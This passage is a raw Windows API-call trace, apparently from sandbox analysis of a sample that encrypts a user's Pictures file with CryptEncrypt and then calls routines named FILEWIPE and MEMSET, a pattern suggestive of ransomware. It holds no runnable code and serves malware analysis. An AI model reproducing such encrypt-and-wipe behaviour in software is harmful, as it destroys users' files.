[0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.971] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.974] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.974] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.974] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.975] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.976] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1010e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10110) returned 1 [0040.976] CharLowerBuffW (in: lpsz="byte[65809]", cchLength=0xb | out: lpsz="byte[65809]") returned 0xb [0040.977] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.977] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x945120*, pdwDataLen=0x6ae220*=0x1010e, dwBufLen=0x10110 | out: pbData=0x945120*, pdwDataLen=0x6ae220*=0x10110) returned 1 [0040.978] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.986] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.986] CryptDestroyKey (hKey=0x7c2280) returned 1 [0040.986] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.987] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.988] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0040.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.988] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.989] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0xa7b7e2d0, ftLastWriteTime.dwHighDateTime=0x1d5b90c, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0x7c2240 [0040.989] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.989] CharLowerBuffW (in: lpsz="byte[65806]", cchLength=0xb | out: lpsz="byte[65806]") returned 0xb [0040.990] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.990] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.990] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.990] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 